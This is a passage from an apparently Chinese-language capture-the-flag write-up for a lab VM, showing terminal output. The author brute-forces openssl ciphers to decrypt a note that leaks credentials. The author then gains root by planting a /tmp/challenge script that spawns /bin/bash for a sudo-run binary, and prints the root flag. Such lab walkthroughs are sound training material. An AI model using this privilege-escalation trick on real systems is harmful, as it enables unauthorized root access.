└─# for Cipher in $(cat CipherTypeRaws);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null ;echo $Cipher;done
aes-128-cbc
l{���[��7�ƏmfE��K����;0�`Z▒�� :�y��N�.�Fj�|z�x�G���rd��/��
�:�Z91�yMV���@��S▒u����_j,����^+�FAC��ﴌ6���-��~��I�_���%���C���Դ��:��}T�q�4�同��#��ʛaes-128-ecb
aes-192-cbc
~I�l2UFײ:H3V�>Z����§��N[sgħ��:��-]�����v;ń#�M��|g��
�|&�As
�� �B0��mĖ�*�0r������{Hw� Ƕ�~�g�X�2▒�'+��+�����[D���5��d����!%o {aes-192-ecb
aes-256-cbc
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,aes-256-ecb
aria-128-cbc
aria-128-cfb
aria-128-cfb1
aria-128-cfb8
aria-128-ctr
t[�����/<T5u���L?c���4��G�▒�ki*�U�f��E0��o��qp���õ/▒���@�wh��G�
ec�r�������]1��9ґp�IDW�p�wj��%�f�~2�LD▒�aria-128-ecb �?g�
aria-128-ofb
aria-192-cbc
aria-192-cfb
aria-192-cfb1
aria-192-cfb8
aria-192-ctr
<�▒�bØ�H�� TG
\�|��$�4���E����F���lS9��s��5��IV:W�[ijn1��E����=��YShL�����Tsq�"���{L�,"
�q�7w1|����s�;�d���/�S��▒7���%h��7�(
"yR����v�2�aria-192-ecb
aria-192-ofb
aria-256-cbc
aria-256-cfb
aria-256-cfb1
aria-256-cfb8
aria-256-ctr
,_���U(t��^>�3cm��=��~�V�ĩx&q�k����!�Z)�ͻ�x�I�䞝JW��▒���a�P����U����N5���Q�c�^Ƕ�> �W*��W����)~Rc#�c`ҋ���u�IPV����yX����]Oan�+�vJ▒1��aria-256-ecb
aria-256-ofb
?L.�ocX(���K��r�t�=���B�w�w����8*_���E#�������m8Bz\�7p��Jv��v�,6ב��;X�G'+��P���X�;j;f���YS1
�
��Ֆt7base64
bf
bf-cbc
bf-cfb
1�a��4�#�yQ.��H���
��8iN�HAn*�RXz{�GS��u�.��ߩ�Y���(�$Ҙ��z�gwF
1�EixN4��Rs�8�e�∌K �B�6M�ە�^vay��IQg
b����)-�wK8Qwx���ϥ��n�U"��1a|$t���HLF�σbf-ecb
bf-ofb
blake2b512
blake2s256
camellia-128-cbc
�!�#bW'ˀ�KE;!�"��{cyF
���7^��4�^�▒�9v��N�Ŧ+2f
���{��u\Z�|�2 �0�'Z�j�wUpRd��ew�:�˪\� �M�TkG%�Nƃ�g�S����Ր��O�{�osV�%�؆��c����0�a�YDD0d�Y�
C&camellia-128-ecb
camellia-192-cbc
�����?�E��wUaf�,T�]6�o�*��h}������J���7c�ю��@�J7��
��L�������~�2C�L34�4ĺ�s��I�$>���7��f����O
�+�{liSLʉ���,��E�U WǜS`Gsj����6�/��t~camellia-192-ecb
camellia-256-cbc
ހ��Ӑ��<�%wLC�~u����pgu�F��:XM��Jc�|����Ř▒��6"�����]7����#����Oܛ�=�
���K��F$��L����IF��u4�fE+.�-W����2
%�(�xC�E����s:�j��7��d�ئ!jc���S��2ʤcamellia-256-ecb
cast
cast5-cbc
cast5-cfb
F�?�<>�~�(�E}�5��\��▒S��4NZ硶Kt��A�fT���C�����R6�������7������-A|��5���Ƞ�`;R��c&m#m�T<x�cq=�oh�▒�0Wb�l��aB�aZ�z"��fTːq_ԙS���&Y�7�^;��]�9�t s�cast5-ecb
cast5-ofb
cast-cbc
des
des3
des-cbc
des-cfb
�Ղ�$�%�.�%��r�A�z��9�_�����;�E��f�|F:{��mfq2�j� >�<����0����Ӓ�������2�&?r�'��:k(#j�0N!���xU0��쯾6b�>���o)������des-ecb
+�D��L�Ҁ�7(��[x��%����E=�<>d&�N�\�D���
��c�*� �`���OjJ-�X�{�'��V�X{g��C▒J,�E
�7�W3η���T��^T��DK=���w�j��&��J?����h(Վ�dId�
6�z��i���FYDN
Q��gdes-ede
6^{�h�R�J-'�yAv/>c�GHA�זϞ�V����$�㢡U�oX�+(���{X���)#KB��g,�5��▒�]��r恘`�����e�9���H▒�k��n�D�i|a��<�\��Kc▒&9S�O��τjg�)�V��-�[7�=��ݹgT��Thdes-ede3
des-ede3-cbc
des-ede3-cfb
des-ede3-ofb
des-ede-cbc
des-ede-cfb
des-ede-ofb
des-ofb
desx
md4
md5
rc2
rc2-40-cbc
rc2-64-cbc
rc2-cbc
rc2-cfb
�>�kO;}r�HLp
��0�+y@�m�^������'���L9*�X�A9{G�+��"��@w���8��wģ�"�TE�����uq(f�rc2-ecb
rc2-ofb
����3�'�/?�PR�| {���B�t�r_���?3�&
����I�9/`�v�����vz~z�(���5��k��iG�[�<gG�▒���j`*/�f�2�
�VX�I.p�Y2DY4��=C��*���Rl!F��▒�t�fyE�<i��y!��MK�N� =�<rc4
����NEI�g�▒�?�L��7�Aˍ�ZV.D*��d���Ʀ�2�J���fԦW �<���,3���W��rIJ�q"��n���#雥��q����'��N6�(
A5-j��y]G!a��O��� z�[,?�T�r;rc4-40
rmd160
seed
seed-cbc
seed-cfb
+�� ��A��!�]v6
�q�▒{T�:�$���� �Qr������4Tԥ�OY�▒�MU�*��{H�$�%�6X��Vc�F�W,���&<�1�GE2��{����4��Q0�{^;!J*��טŮ��PdDXH��Ɍ �#�炅;�<DD��f�
tseed-ecb
seed-ofb
sha1
sha224
sha256
sha3-224
sha3-256
sha3-384
sha3-512
sha384
sha512
sha512-224
sha512-256
shake128
shake256
sm3
sm4-cbc
sm4-cfb
sm4-ctr
d��;�����c�?�>����=���)�,��Ǵx�]����+aT�Ja[�ˇ�����0�H����h�A��
pvyk���]!W�'�m�۽w�v^����n��᥊+���eB_ȓ��Jw�N���{7 ����d�B%A���e��/�7=��\sm4-ecb
sm4-ofb
zlib
zstd
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,aes-256-ecb
echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor, 别担心,总有一天我们会很快到达目的地。
如果你忘记了用户名,请使用旧密码
==>“tribute_to_ippsec”
Victor,
ok拿到了一组凭据
saket
tribute_to_ippsec
ok,接下来还是找提权的点
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
他说如果你能打败我,就当着我的面挑战我
/tmp/challenge: not found
这个文件没有,那我们就创建一个
echo '#!/bin/bash' > challenge
echo '/bin/bash' >> challenge
chmod +x challenge
sudo /home/victor/undefeated_victor
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
完结撒花~~~
-.-
评论区